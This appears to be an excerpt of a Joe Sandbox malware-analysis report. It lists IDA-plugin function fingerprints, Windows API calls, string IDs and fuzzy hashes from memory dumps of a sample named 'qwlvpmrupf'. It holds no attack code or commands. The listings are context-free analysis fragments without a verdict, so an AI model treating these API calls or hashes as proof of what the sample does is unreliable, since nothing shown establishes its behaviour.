                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen
                                                • String ID: X$`uC
                                                • API String ID: 779396738-341515719
                                                • Opcode ID: b2c645edceef864d56483fbf1069a5d01301a1ec413fadac6f3b3a780ac3508a
                                                • Instruction ID: c3c7ba9fb275c39172294b561280a742434215b26961a46d471fdc52ccf842cd
                                                • Opcode Fuzzy Hash: b2c645edceef864d56483fbf1069a5d01301a1ec413fadac6f3b3a780ac3508a
                                                • Instruction Fuzzy Hash: 0921C671E002489BDB26DF98C8057EE7BFC9F49314F00801AE549BB241DBF85A899FA5
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 003909F8
                                                  • Part of subcall function 00393634: RaiseException.KERNEL32(?,?,?,00390A1A,?,00000000,?,?,?,?,?,?,00390A1A,00000000,00439758,00000000), ref: 00393694
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00390A15
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID: Unknown exception
                                                • API String ID: 3476068407-410509341
                                                • Opcode ID: c99e37cb7e904fed209133f9afeb16b2be82bc93d159724730ecff0542bc803e
                                                • Instruction ID: 246de685a262de97d1ec590f47ecf7cf7b2b02b01b983fc068f4bf326badfc7a
                                                • Opcode Fuzzy Hash: c99e37cb7e904fed209133f9afeb16b2be82bc93d159724730ecff0542bc803e
                                                • Instruction Fuzzy Hash: DAF0963490030DBFCF0BBAB8EC46D9E776C5E00750B604121B9149A5F2EB74EE96C5C1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: %.3d$X64
                                                • API String ID: 481472006-1077770165
                                                • Opcode ID: 123be4e4b1c940b5d91d9ca17fe4e9ccfbf644342157ce4fb4fd8b97be36d488
                                                • Instruction ID: 4138e2a93b9c19c12ac4716bdbca9318f5b88b0b6cdeeceb6237a0320cdd73a9
                                                • Opcode Fuzzy Hash: 123be4e4b1c940b5d91d9ca17fe4e9ccfbf644342157ce4fb4fd8b97be36d488
                                                • Instruction Fuzzy Hash: 95D012A1C14118D9CB92AAD08D48EBDB37CA71C300F2044AAF806E2400EA34D958A721
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003F8C52
                                                • TerminateProcess.KERNEL32(00000000), ref: 003F8C59
                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 003F8E3A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                • String ID:
                                                • API String ID: 146820519-0
                                                • Opcode ID: e25af36b492786213ec58893f64bcd173eb4668d8510225ae058bf7cf315f61f
                                                • Instruction ID: 5881a6a7606a9ac2617231cb9073ed94cd369b65cf0487a536992e4b0399c7a9
                                                • Opcode Fuzzy Hash: e25af36b492786213ec58893f64bcd173eb4668d8510225ae058bf7cf315f61f
                                                • Instruction Fuzzy Hash: 4A127B71A083449FC725DF28C484B6ABBE5FF88314F15895DE9898B392CB34ED45CB92
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00376CA1
                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00376CB1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 753cc5166d9c94bb0b6564b3fdcd0794d6a0d38e88e91062f1c38b864b44e242
                                                • Instruction ID: 3a00553f5c314f3621d4dd8826c90237f42c7d747f6569fcc8ff72416e04757b
                                                • Opcode Fuzzy Hash: 753cc5166d9c94bb0b6564b3fdcd0794d6a0d38e88e91062f1c38b864b44e242
                                                • Instruction Fuzzy Hash: 3A31AD71A00A0AFFDB26CF68C981B99B7B4FB04714F15C229E919A7640C775FE94CB90
                                                APIs
                                                  • Part of subcall function 00375F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00376049
                                                • KillTimer.USER32(?,00000001,?,?), ref: 0038FD44
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0038FD53
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003CFDD3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_Timer$Kill
                                                • String ID:
                                                • API String ID: 3500052701-0
                                                • Opcode ID: a32c7b466a1b2953548ab037d6d998db0cf3fc19c885a009bd01cea3ab52b32e
                                                • Instruction ID: e307ea824c5fc1253e54e22edb18a8be88bc1786ef69f7c7f38c2c6ba0db2c9c
                                                • Opcode Fuzzy Hash: a32c7b466a1b2953548ab037d6d998db0cf3fc19c885a009bd01cea3ab52b32e
                                                • Instruction Fuzzy Hash: 0931C575904744AFEB33CF348849BE6BBED9B16304F0004AEE6DA97245C7745E88CB55
                                                APIs
                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,003A895C,?,00439CE8,0000000C), ref: 003A8A94
                                                • GetLastError.KERNEL32(?,003A895C,?,00439CE8,0000000C), ref: 003A8A9E
                                                • __dosmaperr.LIBCMT ref: 003A8AC9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                • String ID:
                                                • API String ID: 2583163307-0
                                                • Opcode ID: 2ea618b66744e294fbd8e8a054362af12a5e5090412e260b097218b7514501ca
                                                • Instruction ID: 9344ffde7d9b122e52e05f4d0b99ff635fb3364a0516e1a07c999f2fd6e5aaeb
                                                • Opcode Fuzzy Hash: 2ea618b66744e294fbd8e8a054362af12a5e5090412e260b097218b7514501ca
                                                • Instruction Fuzzy Hash: 4C018E33A052604AE72727746C85B7E6749CB83734F2B062BF808EF0D2DE718CC58290
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,003A97CA,FF8BC369,00000000,00000002,00000000), ref: 003A9754
                                                • GetLastError.KERNEL32(?,003A97CA,FF8BC369,00000000,00000002,00000000,?,003A5EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00396F61), ref: 003A975E
                                                • __dosmaperr.LIBCMT ref: 003A9765
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                • String ID:
                                                • API String ID: 2336955059-0
                                                • Opcode ID: 227861b3f8aa36ab1d989135ef5f53be5bdd69743eddee521aac9c2300ecc853
                                                • Instruction ID: 077c1382dec946b513d19c8f525d72ded6481769a4e7fae811c3bd5dacd1980c
                                                • Opcode Fuzzy Hash: 227861b3f8aa36ab1d989135ef5f53be5bdd69743eddee521aac9c2300ecc853
                                                • Instruction Fuzzy Hash: F5014C32A20214AFCF069F99DC45D6E3B2EDB86330B24021AF811EB190EA72DD41C7A0
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 00382FB6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: CALL
                                                • API String ID: 1385522511-4196123274
                                                • Opcode ID: 1d3c3c01ec5e67f3c853053c5340adb272670915e9de1b9e8821b8a2a20c7296
                                                • Instruction ID: a79183aa5af918bfd4335acd94916763ab0a73ecf5616914cbaf1b4827461c46
                                                • Opcode Fuzzy Hash: 1d3c3c01ec5e67f3c853053c5340adb272670915e9de1b9e8821b8a2a20c7296
                                                • Instruction Fuzzy Hash: FF2279706083419FC726EF24C484B2ABBF5AF85314F25899DF8968B3A2D771ED45CB42
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d120b001e65988a535b6dbc201a5a222a61d7bbf22c30f42099f42afe59e9277
                                                • Instruction ID: 1dbdefff469b9695613bb9e04edbb81d8b7168356a117de6173a5a4b0cc98028
                                                • Opcode Fuzzy Hash: d120b001e65988a535b6dbc201a5a222a61d7bbf22c30f42099f42afe59e9277
                                                • Instruction Fuzzy Hash: 5532CE70A00205DFDB26EF64C882FAEB7B8EF05310F158599F856EB2A1D731AD45CB91
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003733E9,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 00374227
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FullNamePath_wcslen
                                                • String ID: $D
                                                • API String ID: 4019309064-1684598963
                                                • Opcode ID: 0047073f61291a044e6798f1ad39a07b141d7c26652b513821ddf4a23bbe4d64
                                                • Instruction ID: 840ffc7793f40803ab800e57148a26ca556aa2a6605546e2c1d95ff0c0ddcabf
                                                • Opcode Fuzzy Hash: 0047073f61291a044e6798f1ad39a07b141d7c26652b513821ddf4a23bbe4d64
                                                • Instruction Fuzzy Hash: 6911A53160020897DB62EBA89905EDD77FCAF09354B018466F948DB192DFB8E7849B15
                                                APIs
                                                • GetComputerNameW.KERNEL32(?,?), ref: 003CE6F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ComputerName
                                                • String ID: X64
                                                • API String ID: 3545744682-893830106
                                                • Opcode ID: f9d68bfa337d5a54b69ebcc2301bdc5ff0645c12ab541ffec5bac7e64a345e0d
                                                • Instruction ID: 12072dabec867e7b8a8817c54a66da0fed4c9e205d6ef675ee1c8d818312b627
                                                • Opcode Fuzzy Hash: f9d68bfa337d5a54b69ebcc2301bdc5ff0645c12ab541ffec5bac7e64a345e0d
                                                • Instruction Fuzzy Hash: AFD0C9B4815218EACB92DF80DC88EDD777CBB14300F2004A9F446E2400DB3469489B10
                                                APIs
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 003E9665
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003E9673
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite$FullNamePath
                                                • String ID:
                                                • API String ID: 3876400906-0
                                                • Opcode ID: b57e4b73f4fc5a8856f6529e05028989b318644dc176fd8beb869179ac68e5e5
                                                • Instruction ID: eeec92f46f7ef3e9c0fc5fe9e2c905d8a8a224c9d21087808d10c2b8a12db87d
                                                • Opcode Fuzzy Hash: b57e4b73f4fc5a8856f6529e05028989b318644dc176fd8beb869179ac68e5e5
                                                • Instruction Fuzzy Hash: 6F1149396006259FCB22EF64C844D6EB7B5FF48320B058848E85AAB761CB34FC01CB90
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00373B33,?,00008000), ref: 00376E80
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00373B33,?,00008000), ref: 003B59A2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: fd76b837149b404883c51a71927240d395863e152ce070256aa88410c8dbf3d6
                                                • Instruction ID: 17975ed028bbdaece659f85a9c0d1f22cc7d7831a8451a017b6e4f0ec7c866d6
                                                • Opcode Fuzzy Hash: fd76b837149b404883c51a71927240d395863e152ce070256aa88410c8dbf3d6
                                                • Instruction Fuzzy Hash: 6D016D31145621B6E3310A66CD0EF977F98AF027B4F11C210BA9D6A1E08BB45854DB90
                                                APIs
                                                • IsThemeActive.UXTHEME ref: 003732C4
                                                  • Part of subcall function 0037326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00373282
                                                  • Part of subcall function 0037326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00373299
                                                  • Part of subcall function 00373312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,003732EF,?), ref: 00373342
                                                  • Part of subcall function 00373312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003732EF,?), ref: 00373355
                                                  • Part of subcall function 00373312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00442418,00442400,?,?,?,?,?,?,003732EF,?), ref: 003733C1
                                                  • Part of subcall function 00373312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 00373442
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 003732FE
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                • String ID:
                                                • API String ID: 1550534281-0
                                                • Opcode ID: 031901594b822cc498f6d7ecf0b51bc543597b895630bde221723d8bd7cd8a11
                                                • Instruction ID: b88fa5fc428695b839b901bab4a219d75ef9af7c41f544efdc8d9eca141f6da8
                                                • Opcode Fuzzy Hash: 031901594b822cc498f6d7ecf0b51bc543597b895630bde221723d8bd7cd8a11
                                                • Instruction Fuzzy Hash: F0F0E93A544344AFE7126F70FE0AB643BF0AB01705F908825F90C894E3CBFD84909B08
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: SleepTimetime
                                                • String ID:
                                                • API String ID: 346578373-0
                                                • Opcode ID: bce833eccc7e22b638cd26f40bd0e8e85901f5b9a13f92d54e07f677654024f5
                                                • Instruction ID: 95c8c31d42d912a5d33d6772707ef4568db0d9a1538dc063e12e4aebd691fb0b
                                                • Opcode Fuzzy Hash: bce833eccc7e22b638cd26f40bd0e8e85901f5b9a13f92d54e07f677654024f5
                                                • Instruction Fuzzy Hash: 6AF08C722406059FC360EBA9D509F5AB7E9FF49360F00846EE85ECB260DB70A800CB95
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0037AE65,?,?,?), ref: 00378793
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0037AE65,?,?,?), ref: 003787C9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 626452242-0
                                                • Opcode ID: 5e53de0214d9067124265b495e95d0c0ccee9fd8d0cef423216739b24d89669a
                                                • Instruction ID: f20e43d9b8067fa1247832cf10c15c0a02c83bc74138de7cb224d869bc33f149
                                                • Opcode Fuzzy Hash: 5e53de0214d9067124265b495e95d0c0ccee9fd8d0cef423216739b24d89669a
                                                • Instruction Fuzzy Hash: 0B0184713411057FEB2E6B699D4BF7F7AADDF85750F14403EB506DE190ED609C009524
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 77bbe4f722227cbce17a164e917656fe9705529664e81ba19455d6f200ded61b
                                                • Instruction ID: 8f603a99dfd18bff7fe5e2005771797a5d1c4ae7c317ef16677b7bd2235dcc7f
                                                • Opcode Fuzzy Hash: 77bbe4f722227cbce17a164e917656fe9705529664e81ba19455d6f200ded61b
                                                • Instruction Fuzzy Hash: EC519879A00204AFDF12DF58C841B697BB5EB86364F1A8578E858DF391C771ED42CB90
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 003DFBE3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
